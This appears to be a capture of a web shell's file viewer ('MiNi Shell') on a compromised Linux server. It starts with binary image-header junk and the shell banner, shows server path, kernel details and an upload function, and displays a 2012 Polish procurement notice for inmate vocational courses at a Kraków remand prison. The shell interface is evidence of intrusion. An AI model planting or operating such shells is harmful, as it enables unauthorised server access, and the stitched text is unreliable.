JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120123/21172-N-2012.html

<p class="kh_header"><b>Kraków: Zamówienie na usługi szkoleniowe</b><br>
<b>Numer ogłoszenia: 21172 - 2012; data zamieszczenia: 23.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Montelupich 7, 31-155 Kraków, woj. małopolskie, tel. 012 6345077, faks 012 6335354.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nieposiadająca osobowści prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie na usługi szkoleniowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I  -        kurs przyuczający do zawodu stolarza (jeden cykl)
Część II  -      kurs przyuczający do zawodu grafiki komputerowej Corel Draw Photoshop (jeden cykl) 
Część III     -  zajęcia z zakresu aktywizacji zawodowej (dwa cykle) 
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów przyuczających do zawodu wraz z aktywizacją zawodową dla osadzonych odbywających karę pozbawienia wolności w Areszcie Śledczym w Krakowie w ramach Projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności, realizowanego przez Centralny Zarząd Służby Więziennej, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2012.
W każdym kursie przyuczającym do zawodu oraz cyklu zajęć aktywizacyjnych uczestniczyć będzie 12 osadzonych.
Bezpośrednio po kursie stolarza oraz bezpośrednio po kursie grafiki komputerowej (dla tej samej grupy osób) rozpocznie się cykl zajęć aktywizacyjnych.



Informacje dotyczące części I - kurs przyuczający do zawodu stolarza
1.	Jeden kurs przyuczający do zawodu stolarza obejmuje 120 godzin zajęć (w tym: 20 godz. zajęć teoretycznych (1godz. = 45min.) + 100 godz. zajęć praktycznych  (1 godz. = 60 min.)
2.	Zamawiający zapewnia pomieszczenia oraz sprzęt (zestaw frezerski, pilarka stacjonarna, uciosarka Kapex) niezbędny do przeprowadzenia kursu. Wykonawca zapewnia pozostałe maszyny, urządzenia i narzędzia stanowiące wyposażenie stanowisk niezbędnych do realizacji kursu, a także materiały przeznaczone do organizacji zajęć praktycznych, w ilości gwarantującej należyte wykonanie zamówienia.
3.	Wykonawca zapewnia uczestnikom kursu artykuły piśmiennicze (teczkę, notatnik, długopis), oraz zestawy podręczników i skryptów branżowych. Materiały te przekazane zostaną w ilości 13 kompletów. Na w/w materiałach instytucja szkoleniowa zawrze informację o źródłach finansowania oraz opatrzy obowiązującymi logotypami Kapitał  Ludzki i Unia Europejska.
4.	Wykonawca zapewnia uczestnikom kursu niezbędną odzież roboczą, środki indywidualnej ochrony oraz ubezpieczenie od następstw nieszczęśliwych wypadków. Kopie polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu przed rozpoczęciem kursu.
5.	Wykonawca przed rozpoczęciem kursu dostarczy Zamawiającemu kopie dokumentów potwierdzające uprawnienia osób prowadzących zajęcia do nauczania zawodu zarówno części teoretycznej jak i praktycznej.
6.	Wykonawca przeprowadzi na własny koszt badania lekarskie, niezbędne do stwierdzenia zdolności uczestnika do podjęcia kształcenia kursowego w zawodzie. W razie nieprzystąpienia przebadanego już uczestnika do zajęć, Wykonawca zobowiązany jest do przeprowadzenia badania uczestnika wskazanego z listy rezerwowej.  
7.	Wykonawca zobowiązuje się do zorganizowania szkolenia w taki sposób, aby materiały wykorzystane do realizacji kursu stanowiły maksymalnie 40% wartości szkolenia, 
8.	Wykonawca dopuści do egzaminu tylko tych uczestników, których obecność na zajęciach wynosiła minimum 80%.
9.	W przypadku przerwania szkolenia przez skierowana osobę, Wykonawca niezwłocznie informuje o tym fakcie Zamawiającego, który może skierować w to miejsce kolejną osobę z listy rezerwowej nie ponosząc dodatkowych kosztów a Wykonawca dołoży starań by osoba dołączona do grupy uzupełniła zakres szkolenia, w którym nie uczestniczyła.
10.	Wykonawca wyda uczestnikom, którzy ukończyli kurs zaświadczenie wg wzoru określonego przez MEN oraz certyfikat uczestnictwa w szkoleniu współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
11.	Kurs będzie realizowany w dni robocze - od poniedziałku do piątku, w godzinach od 8:30 do 15:00. 

Informacje dotyczące części II - kurs przyuczający do zawodu grafiki komputerowej Corel Draw Photoshop
1.	Jeden kurs przyuczający do zawodu obejmuje 45 godzin zajęć gdzie 1godz. = 45min
2.	Zamawiający zapewnia pomieszczenia niezbędne do przeprowadzenia kursu oraz zestawy komputerowe.                                                                 
3.	Wykonawca zapewnia - na czas trwania kursu - pozostałe urządzenia oraz dodatkowy sprzęt stanowiące wyposażenie stanowisk niezbędne do realizacji kursu, a także materiały przeznaczone do organizacji zajęć praktycznych (program specjalistyczny) w ilości gwarantującej należyte wykonanie zamówienia. 
4.	Wykonawca zapewnia uczestnikom kursu artykuły piśmiennicze, m.in. teczkę, notatnik oraz długopis. Zestawy podręczników i skryptów branżowych oraz materiały szkoleniowe przygotowywane przez wykładowców przekazane zostaną w ilości 13 kompletów. Na w/w materiałach instytucja szkoleniowa zawrze informację o źródłach finansowania oraz opatrzy obowiązującymi logotypami Kapitał  Ludzki i Unia Europejska.
5.	Wykonawca zapewnia uczestnikom kursu ubezpieczenie od następstw nieszczęśliwych wypadków. Kopie polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu przed rozpoczęciem kursu.
6.	Wykonawca przeprowadzi na własny koszt badania lekarskie, niezbędne do stwierdzenia zdolności uczestnika do podjęcia kształcenia kursowego w zawodzie. W razie nieprzystąpienia przebadanego już uczestnika do zajęć, Wykonawca zobowiązany jest do przeprowadzenia dodatkowego badania dla uczestnika wskazanego z listy rezerwowej.  
7.	Wykonawca zobowiązuje się do zorganizowania szkolenia w taki sposób, aby materiały wykorzystane do realizacji kursu stanowiły maksymalnie 40% wartości szkolenia, potwierdzając to stosownym oświadczeniem.
8.	Wykonawca dopuści do egzaminu tylko tych uczestników, których obecność na zajęciach wynosiła minimum 80%.
9.	W przypadku przerwania szkolenia przez skierowaną osobę, Wykonawca niezwłocznie informuje o tym fakcie Zamawiającego, który może skierować w to miejsce kolejną osobę z listy rezerwowej nie ponosząc dodatkowych kosztów a Wykonawca dołoży starań by osoba dołączona do grupy uzupełniła zakres szkolenia, w którym nie uczestniczyła.
10.	Wykonawca wyda uczestnikom, którzy ukończyli kurs z wynikiem pozytywnym zaświadczenie wg wzoru określonego przez MEN oraz certyfikaty uczestnictwa w szkoleniu współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
11.	Kurs będzie realizowany w dni robocze - od poniedziałku do piątku, w godzinach od 8:00 do 12:30. 

Informacje dotyczące części III - zajęcia z zakresu aktywizacji zawodowej
1.	Zajęcia z aktywizacji zawodowej obejmują 16 godzin zajęć teoretycznych. Godzina zajęć jest jednostką dydaktyczną trwającą 45 minut. 
2.	Zamawiający zapewnia pomieszczenia przeznaczone do przeprowadzenia zajęć. Wykonawca zapewnia dodatkowe wyposażenie niezbędne do realizacji zajęć. 
3.	Wykonawca zapewnia uczestnikom kursu artykuły piśmiennicze, m.in. teczkę, notatnik oraz długopis. Zestawy podręczników i skryptów branżowych oraz materiały szkoleniowe przygotowywane przez wykładowców przekazane zostaną w ilości 13 kompletów. Na w/w materiałach instytucja  szkoleniowa zawrze informację o źródłach finansowania oraz opatrzy obowiązującymi logotypami Kapitał  Ludzki i Unia Europejska.
4.	Wykonawca zapewnia uczestnikom szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków. Kopie polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu przed rozpoczęciem kursu.
5.	Wykonawca zrealizuje zajęcia wykorzystując aktywizujące metody i techniki nauczania, ze szczególnym uwzględnieniem metod symulacyjnych odnoszących się do realiów rynku pracy.
6.	Wykonawca wyda uczestnikom, którzy ukończyli zajęcia zaświadczenie wg wzoru określonego przez MEN oraz certyfikat uczestnictwa w szkoleniu współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
7.	Zajęcia będą realizowane w dni robocze - od poniedziałku do piątku, w godzinach od 8:00 do 12:00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 15.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>odpis wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Krakowie
ul. Montelupich 7
31-155 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 10:00, miejsce: Areszt Śledczy w Krakowie
ul. Montelupich 7
31-155 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs stolarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje dotyczące części I - kurs przyuczający do zawodu stolarza
1.	Jeden kurs przyuczający do zawodu stolarza obejmuje 120 godzin zajęć (w tym: 20 godz. zajęć teoretycznych (1godz. = 45min.) + 100 godz. zajęć praktycznych  (1 godz. = 60 min.)
2.	Zamawiający zapewnia pomieszczenia oraz sprzęt (zestaw frezerski, pilarka stacjonarna, uciosarka Kapex) niezbędny do przeprowadzenia kursu. Wykonawca zapewnia pozostałe maszyny, urządzenia i narzędzia stanowiące wyposażenie stanowisk niezbędnych do realizacji kursu, a także materiały przeznaczone do organizacji zajęć praktycznych, w ilości gwarantującej należyte wykonanie zamówienia.
3.	Wykonawca zapewnia uczestnikom kursu artykuły piśmiennicze (teczkę, notatnik, długopis), oraz zestawy podręczników i skryptów branżowych. Materiały te przekazane zostaną w ilości 13 kompletów. Na w/w materiałach instytucja szkoleniowa zawrze informację o źródłach finansowania oraz opatrzy obowiązującymi logotypami Kapitał  Ludzki i Unia Europejska.
4.	Wykonawca zapewnia uczestnikom kursu niezbędną odzież roboczą, środki indywidualnej ochrony oraz ubezpieczenie od następstw nieszczęśliwych wypadków. Kopie polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu przed rozpoczęciem kursu.
5.	Wykonawca przed rozpoczęciem kursu dostarczy Zamawiającemu kopie dokumentów potwierdzające uprawnienia osób prowadzących zajęcia do nauczania zawodu zarówno części teoretycznej jak i praktycznej.
6.	Wykonawca przeprowadzi na własny koszt badania lekarskie, niezbędne do stwierdzenia zdolności uczestnika do podjęcia kształcenia kursowego w zawodzie. W razie nieprzystąpienia przebadanego już uczestnika do zajęć, Wykonawca zobowiązany jest do przeprowadzenia badania uczestnika wskazanego z listy rezerwowej.  
7.	Wykonawca zobowiązuje się do zorganizowania szkolenia w taki sposób, aby materiały wykorzystane do realizacji kursu stanowiły maksymalnie 40% wartości szkolenia, 
8.	Wykonawca dopuści do egzaminu tylko tych uczestników, których obecność na zajęciach wynosiła minimum 80%.
9.	W przypadku przerwania szkolenia przez skierowana osobę, Wykonawca niezwłocznie informuje o tym fakcie Zamawiającego, który może skierować w to miejsce kolejną osobę z listy rezerwowej nie ponosząc dodatkowych kosztów a Wykonawca dołoży starań by osoba dołączona do grupy uzupełniła zakres szkolenia, w którym nie uczestniczyła.
10.	Wykonawca wyda uczestnikom, którzy ukończyli kurs zaświadczenie wg wzoru określonego przez MEN oraz certyfikat uczestnictwa w szkoleniu współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
11.	Kurs będzie realizowany w dni robocze - od poniedziałku do piątku, w godzinach od 8:30 do 15:00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Procent wartości usługi przeznaczony na materiały szkoleniowe - 30</li>
<li>3. Liczba wykonanych usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs komputerowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje dotyczące części II - kurs przyuczający do zawodu grafiki komputerowej Corel Draw Photoshop
1.	Jeden kurs przyuczający do zawodu obejmuje 45 godzin zajęć gdzie 1godz. = 45min
2.	Zamawiający zapewnia pomieszczenia niezbędne do przeprowadzenia kursu oraz zestawy komputerowe.                                                                 
3.	Wykonawca zapewnia - na czas trwania kursu - pozostałe urządzenia oraz dodatkowy sprzęt stanowiące wyposażenie stanowisk niezbędne do realizacji kursu, a także materiały przeznaczone do organizacji zajęć praktycznych (program specjalistyczny) w ilości gwarantującej należyte wykonanie zamówienia. 
4.	Wykonawca zapewnia uczestnikom kursu artykuły piśmiennicze, m.in. teczkę, notatnik oraz długopis. Zestawy podręczników i skryptów branżowych oraz materiały szkoleniowe przygotowywane przez wykładowców przekazane zostaną w ilości 13 kompletów. Na w/w materiałach instytucja szkoleniowa zawrze informację o źródłach finansowania oraz opatrzy obowiązującymi logotypami Kapitał  Ludzki i Unia Europejska.
5.	Wykonawca zapewnia uczestnikom kursu ubezpieczenie od następstw nieszczęśliwych wypadków. Kopie polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu przed rozpoczęciem kursu.
6.	Wykonawca przeprowadzi na własny koszt badania lekarskie, niezbędne do stwierdzenia zdolności uczestnika do podjęcia kształcenia kursowego w zawodzie. W razie nieprzystąpienia przebadanego już uczestnika do zajęć, Wykonawca zobowiązany jest do przeprowadzenia dodatkowego badania dla uczestnika wskazanego z listy rezerwowej.  
7.	Wykonawca zobowiązuje się do zorganizowania szkolenia w taki sposób, aby materiały wykorzystane do realizacji kursu stanowiły maksymalnie 40% wartości szkolenia, potwierdzając to stosownym oświadczeniem.
8.	Wykonawca dopuści do egzaminu tylko tych uczestników, których obecność na zajęciach wynosiła minimum 80%.
9.	W przypadku przerwania szkolenia przez skierowaną osobę, Wykonawca niezwłocznie informuje o tym fakcie Zamawiającego, który może skierować w to miejsce kolejną osobę z listy rezerwowej nie ponosząc dodatkowych kosztów a Wykonawca dołoży starań by osoba dołączona do grupy uzupełniła zakres szkolenia, w którym nie uczestniczyła.
10.	Wykonawca wyda uczestnikom, którzy ukończyli kurs z wynikiem pozytywnym zaświadczenie wg wzoru określonego przez MEN oraz certyfikaty uczestnictwa w szkoleniu współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
11.	Kurs będzie realizowany w dni robocze - od poniedziałku do piątku, w godzinach od 8:00 do 12:30..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 19.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs aktywizacji zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Informacje dotyczące części III - zajęcia z zakresu aktywizacji zawodowej
1.	Zajęcia z aktywizacji zawodowej obejmują 16 godzin zajęć teoretycznych. Godzina zajęć jest jednostką dydaktyczną trwającą 45 minut. 
2.	Zamawiający zapewnia pomieszczenia przeznaczone do przeprowadzenia zajęć. Wykonawca zapewnia dodatkowe wyposażenie niezbędne do realizacji zajęć. 
3.	Wykonawca zapewnia uczestnikom kursu artykuły piśmiennicze, m.in. teczkę, notatnik oraz długopis. Zestawy podręczników i skryptów branżowych oraz materiały szkoleniowe przygotowywane przez wykładowców przekazane zostaną w ilości 13 kompletów. Na w/w materiałach instytucja  szkoleniowa zawrze informację o źródłach finansowania oraz opatrzy obowiązującymi logotypami Kapitał  Ludzki i Unia Europejska.
4.	Wykonawca zapewnia uczestnikom szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków. Kopie polis ubezpieczeniowych Wykonawca przekaże Zamawiającemu przed rozpoczęciem kursu.
5.	Wykonawca zrealizuje zajęcia wykorzystując aktywizujące metody i techniki nauczania, ze szczególnym uwzględnieniem metod symulacyjnych odnoszących się do realiów rynku pracy.
6.	Wykonawca wyda uczestnikom, którzy ukończyli zajęcia zaświadczenie wg wzoru określonego przez MEN oraz certyfikat uczestnictwa w szkoleniu współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
7.	Zajęcia będą realizowane w dni robocze - od poniedziałku do piątku, w godzinach od 8:00 do 12:00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 08.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com